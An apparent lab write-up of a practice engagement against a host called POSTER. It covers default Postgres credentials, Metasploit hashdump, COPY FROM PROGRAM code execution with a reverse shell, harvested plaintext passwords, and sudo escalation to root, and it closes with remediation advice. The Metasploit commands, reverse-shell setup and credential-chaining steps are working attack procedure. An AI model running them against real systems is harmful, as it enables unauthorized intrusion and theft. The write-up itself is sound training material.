Case file

PostgreSQL weak auth, COPY PROGRAM RCE, and credential chaining

Foundations database engagement: Postgres on 5432 accepted postgres:password; Metasploit COPY FROM PROGRAM yielded an OS shell; credentials in dark’s home and config.php chained to alison with full sudo.

Foundations26 minLinux · PostgreSQL · Metasploit · Credential Reuse
01

Engagement summary

Weak Postgres credentials enabled hashdump and RCE. Local credential files moved us from dark to alison, who held unrestricted sudo.

POSTER (10.49.190.166) exposed OpenSSH, Apache, and PostgreSQL 9.5.21 on 5432. Metasploit postgres_login recovered postgres:password. From there postgres_hashdump and postgres_copy_from_program_cmd_exec produced a shell as the database OS user. /home/dark/credentials.txt held dark:qwerty1234#!hackme for SSH; /var/www/html/config.php disclosed alison / p4ssw0rdS3cur3!#. su alison followed by sudo -s completed root — alison had (ALL : ALL) ALL.

Business impact

Default Postgres passwords on internet-facing 5432 are remote compromise. Credential files in home directories and web configs enable rapid lateral movement. Unrestricted sudo on any user is root by policy. Require strong DB auth, bind Postgres to localhost or VPN, scrub secrets from web trees, and revoke blanket sudo.

02

Postgres login and enumeration

nmap found 5432. postgres_login and hashdump confirmed weak superuser access.

OPERATOR · NMAP

savvy@lab:~$ nmap -sV 10.49.190.166

22/tcp open ssh OpenSSH 7.2p2

80/tcp open http Apache httpd 2.4.18

5432/tcp open postgresql PostgreSQL 9.5.21

OPERATOR · MSF LOGIN

savvy@lab:~$ msfconsole -q

msf6 > use auxiliary/scanner/postgres/postgres_login

msf6 > set RHOSTS 10.49.190.166

msf6 > run

Login Successful: postgres:password

msf6 > use auxiliary/scanner/postgres/postgres_hashdump

msf6 > set PASSWORD password

msf6 > run

# multiple role hashes recovered

03

COPY PROGRAM RCE

postgres_copy_from_program_cmd_exec opened a reverse shell as the DB OS user.

OPERATOR · RCE

msf6 > use exploit/multi/postgres/postgres_copy_from_program_cmd_exec

msf6 > set RHOSTS 10.49.190.166

msf6 > set PASSWORD password

msf6 > set LHOST tun0

msf6 > run

Command shell session opened

savvy@lab:~$ python3 -c 'import pty;pty.spawn("/bin/bash")'

04

Credential chain to alison sudo

dark’s credentials.txt and config.php unlocked alison; sudo -s returned root.

OPERATOR · LATERAL / ROOT

savvy@lab:~$ cat /home/dark/credentials.txt

dark:qwerty1234#!hackme

savvy@lab:~$ ssh dark@10.49.190.166

savvy@lab:~$ grep -E 'uname|pass' /var/www/html/config.php

alison / p4ssw0rdS3cur3!#

savvy@lab:~$ su alison

savvy@lab:~$ sudo -l

(ALL : ALL) ALL

savvy@lab:~$ sudo -s

root@lab:~# id

uid=0(root) gid=0(root) groups=0(root)

Remediation

Disable remote Postgres or require certificate auth; rotate the postgres password. Remove credential files from home directories and web roots. Replace ALL sudo with least-privilege commands.